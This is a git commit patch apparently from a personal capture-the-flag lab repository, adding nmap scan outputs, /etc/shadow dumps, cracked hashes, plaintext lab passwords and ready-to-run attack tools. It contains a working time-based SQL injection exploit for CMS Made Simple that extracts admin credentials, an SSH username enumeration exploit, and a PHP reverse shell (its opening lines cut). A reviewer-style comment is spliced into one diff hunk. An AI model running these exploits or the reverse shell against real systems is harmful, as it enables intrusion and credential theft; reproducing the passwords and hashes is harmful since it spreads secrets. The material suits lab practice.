From 71dd1dc672fb230428ed3662f59b552eac70d215 Mon Sep 17 00:00:00 2001 
From: Raghuram Subramani
Date: Tue, 1 Mar 2022 14:47:08 +0530
Subject: add rooms
---
.gitattributes | 1 +
.gitignore | 1 +
CCPenTesting/nmap/finalbox | 17 ++++
CCPenTesting/nmap/initial | 11 +++
Overpass2Hacked/README.md | 2 +
Overpass2Hacked/cracked.txt | 1 +
Overpass2Hacked/etc-shadow | 5 +
Overpass2Hacked/etc-shadow.txt | 5 +
Overpass2Hacked/hash.txt | 1 +
Overpass2Hacked/nmap/first | 20 ++++
Overpass2Hacked/overpass2.pcapng | Bin 0 -> 3905904 bytes
SimpleCTF/ForMitch.txt | 1 +
SimpleCTF/README.md | 7 ++
SimpleCTF/exploit.py | 186 ++++++++++++++++++++++++++++++++++++++
SimpleCTF/nmap/initial | 35 +++++++
adventofcyber3/day4/README.md | 3 +
adventofcyber3/day4/passwords.txt | 15 +++
internal/45939.py | 65 +++++++++++++
internal/README.md | 27 ++++++
internal/allPort.gnmap | 0
internal/allPort.nmap | 0
internal/allPort.xml | 25 +++++
internal/initial.gnmap | 4 +
internal/initial.nmap | 17 ++++
internal/initial.xml | 44 +++++++++
internal/nmap/initial.nmap | 17 ++++
internal/php-reverse-shell.php | 92 +++++++++++++++++++
27 files changed, 602 insertions(+)
create mode 100644 .gitattributes
create mode 100644 .gitignore
create mode 100755 CCPenTesting/nmap/finalbox
create mode 100755 CCPenTesting/nmap/initial
create mode 100755 Overpass2Hacked/README.md
create mode 100755 Overpass2Hacked/cracked.txt
create mode 100755 Overpass2Hacked/etc-shadow
create mode 100755 Overpass2Hacked/etc-shadow.txt
create mode 100755 Overpass2Hacked/hash.txt
create mode 100755 Overpass2Hacked/nmap/first
create mode 100755 Overpass2Hacked/overpass2.pcapng
create mode 100644 SimpleCTF/ForMitch.txt
create mode 100644 SimpleCTF/README.md
create mode 100644 SimpleCTF/exploit.py
create mode 100644 SimpleCTF/nmap/initial
create mode 100644 adventofcyber3/day4/README.md
create mode 100644 adventofcyber3/day4/passwords.txt
create mode 100644 internal/45939.py
create mode 100644 internal/README.md
create mode 100644 internal/allPort.gnmap
create mode 100644 internal/allPort.nmap
create mode 100644 internal/allPort.xml
create mode 100644 internal/initial.gnmap
create mode 100644 internal/initial.nmap
create mode 100644 internal/initial.xml
create mode 100644 internal/nmap/initial.nmap
create mode 100644 internal/php-reverse-shell.php
diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 0000000..38c0823
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1 @@
+*.vmem filter=lfs diff=lfs merge=lfs -text
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..a86311d
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+compromyse.ovpn
diff --git a/CCPenTesting/nmap/finalbox b/CCPenTesting/nmap/finalbox
new file mode 100755
index 0000000..03ad7dc
--- /dev/null
+++ b/CCPenTesting/nmap/finalbox
@@ -0,0 +1,17 @@
+# Nmap 7.80 scan initiated Fri Feb 25 09:59:30 2022 as: nmap -sC -sV -oN nmap/finalbox 10.10.235.31
+Nmap scan report for 10.10.235.31
+Host is up (0.18s latency).
+Not shown: 998 closed ports
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
+| 256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
+|_ 256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
+80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+|_http-server-header: Apache/2.4.18 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Feb 25 09:59:57 2022 -- 1 IP address (1 host up) scanned in 27.09 seconds
diff --git a/CCPenTesting/nmap/initial b/CCPenTesting/nmap/initial
new file mode 100755
index 0000000..159e74a
--- /dev/null
+++ b/CCPenTesting/nmap/initial
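Review bot: The .gitignore hunk excludes only `compromyse.ovpn`, while the same commit checks in credential material and a large binary: Overpass2Hacked/etc-shadow (and its byte-identical copy etc-shadow.txt, both blob 270d361), cracked.txt, internal/README.md with plaintext account and root passwords, and the 3905904-byte overpass2.pcapng that the .gitattributes LFS rule (`*.vmem` only) does not cover. These are lab values, but once pushed they stay in history, so keep secrets in an ignored notes file and either widen the LFS rule to captures (`*.pcapng filter=lfs diff=lfs merge=lfs -text`) or add them to .gitignore. internal/allPort.gnmap and internal/allPort.nmap are committed empty (blob e69de29), which looks like an aborted scan rather than intended content.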
@@ -0,0 +1,11 @@
+# Nmap 7.80 scan initiated Fri Feb 25 08:39:09 2022 as: nmap -sC -sV -oN nmap/initial 10.10.52.126
+Nmap scan report for 10.10.52.126
+Host is up (0.19s latency).
+Not shown: 999 closed ports
+PORT STATE SERVICE VERSION
+80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+|_http-server-header: Apache/2.4.18 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Feb 25 08:39:39 2022 -- 1 IP address (1 host up) scanned in 29.87 seconds
diff --git a/Overpass2Hacked/README.md b/Overpass2Hacked/README.md
new file mode 100755
index 0000000..9b033d1
--- /dev/null
+++ b/Overpass2Hacked/README.md
@@ -0,0 +1,2 @@
+attacker ip `192.168.170.145`
+dest ip `192.168.170.159`
\ No newline at end of file
diff --git a/Overpass2Hacked/cracked.txt b/Overpass2Hacked/cracked.txt
new file mode 100755
index 0000000..5ddcbe5
--- /dev/null
+++ b/Overpass2Hacked/cracked.txt
@@ -0,0 +1 @@
+6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16
diff --git a/Overpass2Hacked/etc-shadow b/Overpass2Hacked/etc-shadow
new file mode 100755
index 0000000..270d361
--- /dev/null
+++ b/Overpass2Hacked/etc-shadow
@@ -0,0 +1,5 @@
+james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
+paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
+szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
+bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
+muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
diff --git a/Overpass2Hacked/etc-shadow.txt b/Overpass2Hacked/etc-shadow.txt
new file mode 100755
index 0000000..270d361
--- /dev/null
+++ b/Overpass2Hacked/etc-shadow.txt
@@ -0,0 +1,5 @@
+james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
+paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
+szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
+bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
+muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
diff --git a/Overpass2Hacked/hash.txt b/Overpass2Hacked/hash.txt
new file mode 100755
index 0000000..6b26fdc
--- /dev/null
+++ b/Overpass2Hacked/hash.txt
@@ -0,0 +1 @@
+6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
diff --git a/Overpass2Hacked/nmap/first b/Overpass2Hacked/nmap/first
new file mode 100755
index 0000000..48f87c3
--- /dev/null
+++ b/Overpass2Hacked/nmap/first
@@ -0,0 +1,20 @@
+# Nmap 7.80 scan initiated Fri Feb 25 07:48:08 2022 as: nmap -sC -sV -oN nmap/first 10.10.13.215
+Nmap scan report for 10.10.13.215
+Host is up (0.19s latency).
+Not shown: 997 closed ports
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
+| 256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
+|_ 256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
+80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: LOL Hacked
+2222/tcp open ssh OpenSSH 8.2p1 Debian 4 (protocol 2.0)
+| ssh-hostkey:
+|_ 2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Feb 25 07:49:16 2022 -- 1 IP address (1 host up) scanned in 68.23 seconds
diff --git a/Overpass2Hacked/overpass2.pcapng b/Overpass2Hacked/overpass2.pcapng
new file mode 100755
index 0000000..5ec787d
Binary files /dev/null and b/Overpass2Hacked/overpass2.pcapng differ
diff --git a/SimpleCTF/ForMitch.txt b/SimpleCTF/ForMitch.txt
new file mode 100644
index 0000000..596c727
--- /dev/null
+++ b/SimpleCTF/ForMitch.txt
@@ -0,0 +1 @@
+Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
diff --git a/SimpleCTF/README.md b/SimpleCTF/README.md
new file mode 100644
index 0000000..b0465a6
--- /dev/null
+++ b/SimpleCTF/README.md
@@ -0,0 +1,7 @@
+IP address >`10.10.73.108`
+
+SSH >
+```
+mitch
+secret
+```
\ No newline at end of file
diff --git a/SimpleCTF/exploit.py b/SimpleCTF/exploit.py
new file mode 100644
index 0000000..260e4e7
--- /dev/null
+++ b/SimpleCTF/exploit.py
@@ -0,0 +1,186 @@ +#!/usr/bin/env python3 +# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9 +# Date: 30-03-2019 +# Exploit Author: Daniele Scanu @ Certimeter Group +# Vendor Homepage: https://www.cmsmadesimple.org/ +# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ +# Version: <= 2.2.9 +# Tested on: Ubuntu 18.04 LTS +# CVE : CVE-2019-9053 + +import requests +from termcolor import colored +import time +from termcolor import cprint +import optparse +import hashlib + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)") +parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password") +parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False) + +options, args = parser.parse_args() +if not options.url: + print "[+] Specify an url target" + print "[+] Example usage (no cracking password): exploit.py -u http://target-uri" + print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist" + print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based." 
+ exit() + +url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0' +session = requests.Session() +dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$' +flag = True +password = "" +temp_password = "" +TIME = 1 +db_name = "" +output = "" +email = "" + +salt = '' +wordlist = "" +if options.wordlist: + wordlist += options.wordlist + +def crack_password(): + global password + global output + global wordlist + global salt + dict = open(wordlist) + for line in dict.readlines(): + line = line.replace("\n", "") + beautify_print_try(line) + if hashlib.md5(str(salt) + line).hexdigest() == password: + output += "\n[+] Password cracked: " + line + break + dict.close() + +def beautify_print_try(value): + global output + print "\033c" + cprint(output,'green', attrs=['bold']) + cprint('[*] Try: ' + value, 'red', attrs=['bold']) + +def beautify_print(): + global output + print "\033c" + cprint(output,'green', attrs=['bold']) + +def dump_salt(): + global flag + global salt + global output + ord_salt = "" + ord_salt_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_salt = salt + dictionary[i] + ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_salt) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + salt = temp_salt + ord_salt = ord_salt_temp + flag = True + output += '\n[+] Salt for password found: ' + salt + +def dump_password(): + global flag + global password + global output + ord_password = "" + ord_password_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_password = password + dictionary[i] + ord_password_temp = 
ord_password + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_password) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users" + payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + password = temp_password + ord_password = ord_password_temp + flag = True + output += '\n[+] Password found: ' + password + +def dump_username(): + global flag + global db_name + global output + ord_db_name = "" + ord_db_name_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_db_name = db_name + dictionary[i] + ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_db_name) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + db_name = temp_db_name + ord_db_name = ord_db_name_temp + output += '\n[+] Username found: ' + db_name + flag = True + +def dump_email(): + global flag + global email + global output + ord_email = "" + ord_email_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_email = email + dictionary[i] + ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_email) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + 
email = temp_email + ord_email = ord_email_temp + output += '\n[+] Email found: ' + email + flag = True + +dump_salt() +dump_username() +dump_email() +dump_password() + +if options.cracking: + print colored("[*] Now try to crack password") + crack_password() + +beautify_print() \ No newline at end of file diff --git a/SimpleCTF/nmap/initial b/SimpleCTF/nmap/initial new file mode 100644 index 0000000..3ae0e7d --- /dev/null +++ b/SimpleCTF/nmap/initial @@ -0,0 +1,35 @@ +# Nmap 7.80 scan initiated Mon Feb 28 21:34:09 2022 as: nmap -sC -sV -oN nmap/initial 10.10.73.108 +Nmap scan report for 10.10.73.108 +Host is up (0.19s latency). +Not shown: 997 filtered ports +PORT STATE SERVICE VERSION +21/tcp open ftp vsftpd 3.0.3 +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +|_Can't get directory listing: TIMEOUT +| ftp-syst: +| STAT: +| FTP server status: +| Connected to ::ffff:10.17.36.210 +| Logged in as ftp +| TYPE: ASCII +| No session bandwidth limit +| Session timeout in seconds is 300 +| Control connection is plain text +| Data connections will be plain text +| At session startup, client count was 3 +| vsFTPd 3.0.3 - secure, fast, stable +|_End of status +80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) +| http-robots.txt: 2 disallowed entries +|_/ /openemr-5_0_1_3 +|_http-server-header: Apache/2.4.18 (Ubuntu) +|_http-title: Apache2 Ubuntu Default Page: It works +2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA) +| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA) +|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519) +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Mon Feb 28 21:35:07 2022 -- 1 IP address (1 host up) scanned in 57.41 seconds 
diff --git a/adventofcyber3/day4/README.md b/adventofcyber3/day4/README.md
new file mode 100644
index 0000000..83d8114
--- /dev/null
+++ b/adventofcyber3/day4/README.md
@@ -0,0 +1,3 @@
+```
+password > cookie
+```
diff --git a/adventofcyber3/day4/passwords.txt b/adventofcyber3/day4/passwords.txt
new file mode 100644
index 0000000..6f45b3a
--- /dev/null
+++ b/adventofcyber3/day4/passwords.txt
@@ -0,0 +1,15 @@
+christmas
+elves!
+santa
+festive
+joy123
+myrrh!
+yuletide
+presents
+candy
+tidings
+cookie
+cookies
+biscuits!
+snowball
+snowball123
diff --git a/internal/45939.py b/internal/45939.py
new file mode 100644
index 0000000..76298e3
--- /dev/null
+++ b/internal/45939.py
@@ -0,0 +1,65 @@ +#!/usr/bin/env python2 +# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io +# Credits: Matthew Daley, Justin Gardner, Lee David Painter + +import argparse, logging, paramiko, socket, sys, os + +class InvalidUsername(Exception): + pass + +# malicious function to malform packet +def add_boolean(*args, **kwargs): + pass + +# function that'll be overwritten to malform the packet +old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[ + paramiko.common.MSG_SERVICE_ACCEPT] + +# malicious function to overwrite MSG_SERVICE_ACCEPT handler +def service_accept(*args, **kwargs): + paramiko.message.Message.add_boolean = add_boolean + return old_service_accept(*args, **kwargs) + +# call when username was invalid +def invalid_username(*args, **kwargs): + raise InvalidUsername() + +# assign functions to respective handlers +paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept +paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username + +# perform authentication with malicious packet and username +def check_user(username): + sock = socket.socket() + sock.connect((args.target, args.port)) + transport = paramiko.transport.Transport(sock) + + try: + transport.start_client() + except paramiko.ssh_exception.SSHException: + print '[!] 
Failed to negotiate SSH transport' + sys.exit(2) + + try: + transport.auth_publickey(username, paramiko.RSAKey.generate(2048)) + except InvalidUsername: + print "[-] {} is an invalid username".format(username) + sys.exit(3) + except paramiko.ssh_exception.AuthenticationException: + print "[+] {} is a valid username".format(username) + +# remove paramiko logging +logging.getLogger('paramiko.transport').addHandler(logging.NullHandler()) + +parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)') +parser.add_argument('target', help="IP address of the target system") +parser.add_argument('-p', '--port', default=22, help="Set port of SSH service") +parser.add_argument('username', help="Username to check for validity.") + +if len(sys.argv) == 1: + parser.print_help() + sys.exit(1) + +args = parser.parse_args() + +check_user(args.username) diff --git a/internal/README.md b/internal/README.md new file mode 100644 index 0000000..9330910 --- /dev/null +++ b/internal/README.md @@ -0,0 +1,27 @@ +IP > `10.10.154.125` + +``` +admin: my2boys +``` + +``` +aubreanna:bubb13guM!@#123 +``` + +``` +Internal Jenkins service is running on 172.17.0.2:8080 +``` +```bash +ssh -f -g -L 5053:192.168.60.101:502 user@192.168.60.100 -N +``` + +Jenkins +``` +admin: spongebob +``` + +root pass + +``` +root:tr0ub13guM!@#123 +``` diff --git a/internal/allPort.gnmap b/internal/allPort.gnmap new file mode 100644 index 0000000..e69de29 diff --git a/internal/allPort.nmap b/internal/allPort.nmap new file mode 100644 index 0000000..e69de29 diff --git a/internal/allPort.xml b/internal/allPort.xml new file mode 100644 index 0000000..1197b8e --- /dev/null +++ b/internal/allPort.xml @@ -0,0 +1,25 @@ + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/internal/initial.gnmap b/internal/initial.gnmap new file mode 100644 index 0000000..06f775b --- /dev/null +++ b/internal/initial.gnmap 
@@ -0,0 +1,4 @@ +# Nmap 7.80 scan initiated Tue Mar 1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197 +Host: 10.10.252.197 (internal.thm) Status: Up +Host: 10.10.252.197 (internal.thm) Ports: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/ Ignored State: closed (998) +# Nmap done at Tue Mar 1 12:14:16 2022 -- 1 IP address (1 host up) scanned in 34.54 seconds diff --git a/internal/initial.nmap b/internal/initial.nmap new file mode 100644 index 0000000..e199a01 --- /dev/null +++ b/internal/initial.nmap @@ -0,0 +1,17 @@ +# Nmap 7.80 scan initiated Tue Mar 1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197 +Nmap scan report for internal.thm (10.10.252.197) +Host is up (0.18s latency). +Not shown: 998 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA) +| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA) +|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519) +80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) +|_http-server-header: Apache/2.4.29 (Ubuntu) +|_http-title: Apache2 Ubuntu Default Page: It works +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Tue Mar 1 12:14:16 2022 -- 1 IP address (1 host up) scanned in 34.54 seconds diff --git a/internal/initial.xml b/internal/initial.xml new file mode 100644 index 0000000..f9ad390 --- /dev/null +++ b/internal/initial.xml @@ -0,0 +1,44 @@ + + + + + + + + + +
+ + + + + + +cpe:/a:openbsd:openssh:7.6p1cpe:/o:linux:linux_kernel +cpe:/a:apache:http_server:2.4.29 + + + + + + diff --git a/internal/nmap/initial.nmap b/internal/nmap/initial.nmap new file mode 100644 index 0000000..32501ae --- /dev/null +++ b/internal/nmap/initial.nmap @@ -0,0 +1,17 @@ +# Nmap 7.80 scan initiated Tue Mar 1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197 +Not shown: 998 closed ports +Nmap scan report for internal.thm (10.10.252.197) +Host is up (0.18s latency). +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA) +| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA) +|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519) +80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) +|_http-server-header: Apache/2.4.29 (Ubuntu) +|_http-title: Apache2 Ubuntu Default Page: It works +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Tue Mar 1 12:14:16 2022 -- 1 IP address (1 host up) scanned in 34.54 seconds diff --git a/internal/php-reverse-shell.php b/internal/php-reverse-shell.php new file mode 100644 index 0000000..c9b702a --- /dev/null +++ b/internal/php-reverse-shell.php 
@@ -0,0 +1,92 @@ + array("pipe", "r"), + 1 => array("pipe", "w"), + 2 => array("pipe", "w") +); +$process = proc_open($shell, $descriptorspec, $pipes); +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); +printit("Successfully opened reverse shell to $ip:$port"); +while (1) { + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} +?> -- cgit v1.2.3